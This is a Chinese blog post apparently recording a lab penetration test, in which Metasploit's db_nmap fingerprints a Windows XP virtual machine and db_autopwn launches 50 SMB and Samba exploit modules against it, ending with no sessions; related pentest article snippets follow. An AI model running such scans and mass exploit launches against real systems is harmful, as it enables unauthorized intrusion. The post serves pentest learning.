metasploit之db_autopwn实战

最新推荐文章于 2024-05-08 16:11:21 发布
最新推荐文章于 2024-05-08 16:11:21 发布
阅读量5.6k 收藏 1
点赞数 1
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9502199
版权 
msf > db_nmap -O 192.168.1.142
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT
[*] Nmap: Nmap scan report for 192.168.1.142
[*] Nmap: Host is up (0.00047s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT     STATE  SERVICE
[*] Nmap: 139/tcp  open   netbios-ssn
[*] Nmap: 445/tcp  open   microsoft-ds
[*] Nmap: 2869/tcp closed icslap
[*] Nmap: MAC Address: 00:0C:29:F1:31:D2 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (99%)
[*] Nmap: Aggressive OS guesses: Microsoft Windows XP SP3 (99%), Microsoft Windows XP (97%), Microsoft Windows Server 2003 SP1 or SP2 (97%), Microsoft Windows Server 2003 SP2 (97%), Microsoft Windows 2000 SP4 (95%), Microsoft Windows XP SP2 (95%), Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows 2000 SP0 (95%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds
msf > hosts

Hosts
=====

address        mac                name  os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------            ---------  -----  -------  ----  --------
192.168.1.142  00:0C:29:F1:31:D2        Microsoft Windows  XP                device         

msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*]   192.168.1.142:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*] 
[*] 
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

msf >


实战对象是XP SP3,如果单独使用ms08_067_netapi,是可以成功exploit的。但是,自动化后,就不行了。

db_autopwn前,应该对module进行过滤。

feier7501
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
db_autopwn.rb
08-26
MSF 4.5版本,没有了db_autopwn模块,此功能不能使用。 ==================================================== 可利用此插件,下载db_autopwn的执行脚本,并且复制到/opt/metasploit/msf3/plugins/中。 运行:load db_autopwn.rb 提示,每次使用都得运行一次load db_autopwn =======================================================
db_autopwn在KALI LINUX中不能使用解决办法
12-30
发现db_autopwn命令在KALI LINUX中使用不了,加载db_autopwn时出来如下错误: msf > load db_autopwn [-] Failed to load plugin from /opt/framework3/msf3/plugins/db_autopwn: no such file to load -- /opt/framework3/msf3/plugins/db_autopw.RAR中的文档和脚本提供了解决办法
Metasploit Framework(MSF)从入门到实战(二)
最新发布
qq_59468567的博客
05-08 1327
msfvenom — Metasploit 独立有效负载生成器,是用来生成后门的软件,在目标机上执行后门上线。-l, --list 列出 [type] 的所有模块。类型有:payloads、encoders、 nops、platforms、archs、encrypt、formats、all-p, --payload 要使用的有效负载(--list 要列出的有效负载,--listoptions 用于参数)。为自定义指定“-”或 STDIN。
Kail之MSF渗透测试--MS08-067
m0_57485346的博客
02-13 1405
MS08-067
网络安全学习之主机扫描和漏洞扫描
热门推荐
chaootis1的博客
07-13 1万+
主机扫描 主机扫描一般在信息搜集阶段进行,用于了解目标主机上运行的服务以便进一步进行渗透。 用的工具主要是nmap,详细用法自行百度,我就说一下常用的几种组合 1. nmap -sn ip地址(可以是单个ip地址,也可以是一个范围192.168.1.1-192.168.1.20,也可以是用逗号隔开的几个ip, 192.168.1.1,192.168.1.2,也可以是一个网段192.168....
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Liu_Bruce的博客
05-15 1167
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块。这种攻击的思路是渗透者构造一个攻击用的Web服务器,然后将这Web服务器的地址发给我目标用户,当目标用户使用有漏洞的浏览器打开这个地址的时候,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功,就会在目标主机上建立一个Meterpreter会话。 实 验 环 境 攻击机:Linux kali 5.10.0 IP
metasploit 基础指令
weixin_50910324的博客
09-08 471
命令: show exploits 作者:吃鸡蛋的肉 链接:https://www.jianshu.com/p/7e630bbd294a 来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
b2_自动攻击_db_autopwn
yeshankuangrenaaaaa的博客
01-07 1699
目标:实现对目标主机进行自动漏洞攻击 1 采用db_nmap + db_autopwn 关于db_autopwn: The db_autopwn command is not officially supported and exists only in a branch. not well maintained,crashes systems,and crashes itself use on...
metasploit常用命令
Johnathan的博客
03-03 530
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
db_autopwn
09-21
there is a very good reason why db_autopwn is deprecated , so i am not trying to fix metasploit , this post is ONLY for basic information
msf5 自动攻击模块 db_autopwn
07-10
msf5 自动攻击模块 db_autopwn msf5 自动攻击模块 db_autopwn
Autopwn:一个简单的基于bash的metasploit自动化工具!
01-31
Autopwn:一个简单的基于bash的metasploit自动化工具!
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
Mastering Metasploit Framework
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器
qq_43233085的博客
01-13 1580
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器Browser Autopwn介绍操作步骤 Browser Autopwn介绍 Browser Autopwn 是由Metasploit提供的一个辅助模块。 当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。 Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozi...
Metasploit渗透测试指南》命令参考列表
weixin_38169786的博客
08-09 827
1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。 info 展示出制定渗透攻击或模...
Linux上用metasploit使用mysql_version模块怎么操作
05-26
使用 Metasploit 的 mysql_version 模块可以帮助你获取目标主机上正在运行的 MySQL 版本信息。下面是在 Linux 上使用 Metasploit 的 mysql_version 模块的步骤: 1. 打开终端并启动 Metasploit 控制台:`msfconsole` 2. 使用 search 命令查找 mysql_version 模块:`search mysql_version` 3. 选择 mysql_version 模块:`use auxiliary/scanner/mysql/mysql_version` 4. 设置目标主机的 IP 地址:`set RHOSTS <目标主机IP>` 5. 设置目标主机的 MySQL 端口号(如果不是默认的 3306 端口):`set RPORT <目标主机MySQL端口号>` 6. 设置好后,运行模块:`run` 7. 执行完毕后,你可以在输出结果中查看目标主机上正在运行的 MySQL 版本信息。 注意:使用 Metasploit 进行渗透测试需要遵守相关法律法规和道德规范,仅限于测试授权的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值